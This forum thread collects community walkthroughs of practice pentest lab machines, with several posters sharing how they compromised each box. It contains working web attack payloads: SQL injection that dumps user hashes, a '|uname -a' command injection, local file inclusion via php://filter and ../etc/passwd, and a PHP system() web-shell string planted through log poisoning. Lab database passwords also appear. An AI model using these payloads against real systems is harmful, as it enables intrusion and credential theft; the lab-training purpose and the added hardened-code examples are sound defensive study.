PracticalPentestLabs.com boxes writeups

Much appreciated Mr Rick ! :slight_smile:

I never heard it. Thanks a lot :slight_smile:

No problem @cecu, if you successfully PWN “HIGINI” give us some hints … it’s a pain!

Thanks for the share! I just saw that ‘HAGINI’ and got command execution on it already, but I don’t know what to do with it, nothing to read :smiley:

Awesome, @exploit … yeah there isn’t a flag submission system there, they are working on it as per their latest tweet

We know the current UI and website interface are crappy, we are working on something new. In the meantime you can still join and practice :slightly_smiling_face:

— PracticalPentestLabs (@ppentestlabs) June 10, 2017
Can you write a small walk-through on how you did "HIGINI"?
1 Like

HOSTNAME:C3PO
IP:10.0.1.6

I found a SQLi in the search box

http://10.0.1.6/inc/search.php?query=xxx

By adding a single quote you’ll get the error message

I used SQLMap for quick and fast injection

As you see, 3 types of injection …

Anyway

select table_name FROM information_schema.tables where table_schema='vuln' [13]:
[*] adrbook
[*] eshop_goods
[*] eshop_orders
[*] flashgames
[*] log
[*] messages
[*] provozovny
[*] review_answers
[*] review_category
[*] review_questions
[*] statistics
[*] tickets
[*] users

select column_name from information_schema.columns where table_name='users' [10]:
[*] alterpass
[*] heslo
[*] id
[*] image
[*] isadmin
[*] login
[*] nick
[*] remail
[*] secondmail
[*] telefon

SELECT id,login,heslo,isadmin FROM users [13]:

[*] 1, karel, f196c5c9a5f002d14cfc2aafce74e39b, 0
[*] 2, jana, 3f858cf8cfd59f25010e71b6b5671428, 0
[*] 12, michal, 955db0b81ef1989b4a4dfeae8061a9a6, 0
[*] 13, Smolicek, 593a90797681ebd0b8c44315a4caf6ff, 0
[*] 14, jezinky, 4475987873e549d5208f8ad743fc3d07, 0
[*] 15, utocnik, 955db0b81ef1989b4a4dfeae8061a9a6, 0
[*] 18, uzivatel, 32250170a0dca92d53ec9624f336ca24, 0
[*] 21, admin, 32250170a0dca92d53ec9624f336ca24, 1
[*] 23, prochy, 32f055ca38a83ecb670b04edb50016ad, 0
[*] 24, prochy2, 2d8883c2d85b14fdcb44e3b3dc959535, 0
[*] 25, butterfly2, 1adbb3178591fd5bb0c248518f39bf6d, 0
[*] 26, test, 098f6bcd4621d373cade4e832627b4f6, 0
[*] 27, qyqouxmg, ae219661afe50f60419afbe08c45947d, 0

The only user with admin privileges is admin himself :stuck_out_tongue:

[*] 21, admin, 32250170a0dca92d53ec9624f336ca24, 1

Login …

go to this option

And as we know :stuck_out_tongue: the ping option uses the “system” function or “exec” or … so it’s clear that this box is vulnerable

Lemme check if it works first; let’s ping the local IP address 127.0.0.1

Okay Cool :smiley:

To run many functions you have to use | as a separator between them

The PHP code must be something like this

<?php echo system("ping {$_GET['host']}"); ?>

So let’s try to send this request

127.0.0.1|uname -a

Works Fine :smiley:

Whatever …

I tried to upload a PHP shell using “wget” but nothing …
I read some PHP files using the “cat” command

That led me to the config file named “base.php”

// .... PHP code
    $mysqlServer = 'localhost';
    $mysqlUser = 'vuln';
    $mysqlPassword = 'vuln';
    $mysqlName = 'vuln';
// .... PHP code

… To Be Continued

2 Likes
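The ping handler guessed in the writeup above, placed beside a hardened version, as an added example that is not code from the original post or from the lab; `ping_vulnerable`, `ping_hardened` and the `host` parameter name are assumptions, and input validation plus `escapeshellarg()` is the substituted mitigation.

```php
<?php
// Added example, not code from the original post: the guessed vulnerable
// ping handler from the C3PO writeup next to a hardened version.
// The function names and the `host` parameter are assumptions.

// VULNERABLE (as guessed in the writeup): the raw query value is spliced into
// a shell command line, so "127.0.0.1|uname -a" runs a second command.
function ping_vulnerable(string $host): string
{
    return (string) shell_exec("ping -c 1 {$host} 2>&1");
}

// HARDENED: accept only an IP address or a plain hostname, then quote the
// value so the shell never sees metacharacters such as | ; ` $ or newlines.
function ping_hardened(string $host): string
{
    $isIp = filter_var($host, FILTER_VALIDATE_IP) !== false;
    // Plain hostname allow-list; the first character must be alphanumeric so
    // the value can never be parsed by ping as an option such as "-f".
    $isHostname = preg_match('/^[A-Za-z0-9][A-Za-z0-9.-]{0,252}$/', $host) === 1;
    if (!$isIp && !$isHostname) {
        throw new InvalidArgumentException('host must be an IP address or hostname');
    }
    // escapeshellarg() single-quotes the value and escapes embedded quotes.
    // Validation above is the real control; quoting is defence in depth.
    // (On PHP 7.4+ proc_open() also accepts an argv array, which skips the
    // shell entirely and is the stronger option where available.)
    $cmd = 'ping -c 1 -W 2 ' . escapeshellarg($host) . ' 2>&1';
    return (string) shell_exec($cmd);
}

// Demonstration with a benign value and the payload from the writeup.
foreach (['127.0.0.1', '127.0.0.1|uname -a'] as $input) {
    try {
        echo "hardened({$input}):\n" . ping_hardened($input) . "\n";
    } catch (InvalidArgumentException $e) {
        echo "hardened({$input}): rejected, {$e->getMessage()}\n";
    }
}
```

The second input is rejected before any process is spawned, whereas `ping_vulnerable` would hand the whole string to the shell.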

Awesome, thank you guys. Looking forward to more :slight_smile:

HOSTNAME:TADDEO
IP:10.0.3.10

Let’s add “name” as a parameter to our request

Nothing shown! Let’s add phpinfo.php

Looks like LFI (Local File Include) …

Let’s read the config.php file via a PHP filter

php://filter/convert.base64-encode/resource=config.php

We’ll get a base64 string

<?php
define( 'DB_NAME', 'test' );

/** MySQL database username */
define( 'DB_USER', 'taddeo' );

/** MySQL database password */
define( 'DB_PASSWORD', 'taddeo@321' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );

?>

This is the code after decoding …

Now let’s read the /etc/passwd file

view-source:http://10.0.3.10/file.php?name=/etc/passwd

I’m trying to upload a PHP shell

So I’ll update this post if there is anything important, or I’ll try to solve another challenge!

1 Like

HOSTNAME:TADDEO
IP:10.0.3.10

Did the same as DamaneDz
Then I used the MySQL user to log in to ssh
Then managed to escalate my privs to root

I did a quick search for the flag but didn’t have any luck.

Any ideas?

HOSTNAME: RASIM
IP: 10.0.3.11

Quick nmap scan

Nmap scan report for 10.0.3.11

PORT STATE SERVICE
22/tcp open ssh
111/tcp open rpcbind
2049/tcp open nfs

I tried to mount the NFS export locally

mount 10.0.3.11:/ /test/

After a bit of digging around I found that /home/rasim/ had ssh keys in there.

Haven’t attempted to replace them yet but I am guessing that should give us SSH access to the box.

10.0.1.6

Hi,

Should I not be able to ping my attack PC?

I am trying to get a shell but seeing that I am unable to even ping my PC the shell won’t connect back, or is this part of the challenge?

Thanks

Good job on TADDEO and RASIM. I was able to get a shell the same way, although I did find the FLAG in the root/ directory of the host. I think you should check back when the hosts are reverted :slight_smile:

> 10.0.1.6
>
> Hi,
>
> Should I not be able to ping my attack PC?
>
> I am trying to get a shell but seeing that I am unable to even ping my PC the shell won’t connect back, or is this part of the challenge?
>
> Thanks

I think it’s part of the challenge, I was able to bypass that though :wink:

There are no hints in the challenges so I thought I only had to exploit them.
Anyway I solved the first part and you can solve the second :smiley:

Any hints on how you got root on C3PO?

I have a shell and I thought the overlayfs exploit might work, but I couldn’t seem to get it to work. I also tried a few others and they just seemed to crash the server :disappointed:

@pry0cc @oaktree: I believe this post needs to resume on IRC at this point.

1 Like

Why @_py ? is there a limit on how much replies per post ?

@h4x0r: Imagine me and 2-3 other folks tackling picoCTF, which lasts for 2 weeks, on the forum. It’d be much more convenient if you just hang out on IRC and at the same time you won’t be shading other posts.

I agree with @_py. The IRC is the ultimate place for figuring stuff out and solving problems. The forum is a place for discussion, perhaps writeups, how you did it, or one or two issues you may be facing. But a conversation about breaking it, that is a job for the IRC.

If you have ever used Facebook, would you have a conversation in the comment section? That is what this may be like.

3 Likes

Just knocked over HIGINI if anyone is interested.
This is basically the approach I took step by step:

  1. nmap -> find ports 22+80
  2. View source -> find creds ‘test’ and ‘test’. Enter creds but they don’t go far. Some page called ‘expenses.php’ which doesn’t exist (useful later :slight_smile: )
  3. Hit up ‘/robots.txt’. Find /dev.
  4. Download pages -> note obvious LFI from the ‘users’ cookie. Guess that the same pages in /dev are available in /. Test with ../../../../etc/passwd as the user cookie and the LFI works
  5. Using the path /proc/self/fd/2 shows the error log. Note the instance of the ‘referer’ header being written out - particularly when the expenses.php file can’t be found
  6. Log in again but this time polluting the referer header with the <?php echo('thisworks!'); system($_GET['cmd']); ?> string set.
  7. Reroll the 5th step - note the ‘thisworks!’ string being printed.
  8. Passing in cmd=ls as the query yields RCE.

DB credentials can be found at this point.
Don’t see obvious privesc yet.
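A hardened replacement for the include pattern behind TADDEO’s `file.php?name=` and HIGINI’s ‘users’ cookie, as an added example that is not code from the original posts or the lab; `PAGE_DIR`, the page keys, the file names and the `resolve_page()` helper are assumptions.

```php
<?php
// Added example, not code from the original posts: a hardened page loader
// standing in for the include behind TADDEO's file.php?name= and HIGINI's
// 'users' cookie. PAGE_DIR, the page keys and file names are assumptions.

const PAGE_DIR = __DIR__ . '/pages';

// The request picks a key from this allow-list; it never supplies a path,
// so "../../../../etc/passwd", "php://filter/convert.base64-encode/resource=config.php"
// and "/proc/self/fd/2" are all rejected before any file system call.
const PAGES = [
    'home'     => 'home.php',
    'expenses' => 'expenses.php',
];

// Return the absolute path of an allow-listed page, or null if the request
// does not map to a real file inside PAGE_DIR.
function resolve_page(string $requested): ?string
{
    if (!array_key_exists($requested, PAGES)) {
        return null;
    }
    $base = realpath(PAGE_DIR);
    $real = realpath(PAGE_DIR . '/' . PAGES[$requested]);
    // Defence in depth: realpath() follows symlinks and resolves "..", and a
    // stream wrapper such as php:// has no real path and returns false. The
    // result must still sit strictly below PAGE_DIR.
    if ($base === false || $real === false
        || strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $real;
}

// Web entry point. A rejected selector is logged hex-encoded: the HIGINI
// chain worked because a raw Referer value landed in the error log and the
// log was then included, so log lines must never carry attacker bytes as-is.
$selector = $_GET['name'] ?? $_COOKIE['users'] ?? 'home';
$page = resolve_page($selector);
if ($page === null) {
    http_response_code(404);
    error_log('rejected page selector: ' . bin2hex($selector));
    exit('Not found');
}
include $page;
```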

I’m glad you gave 0 fucks about the 2 comments above.

5 Likes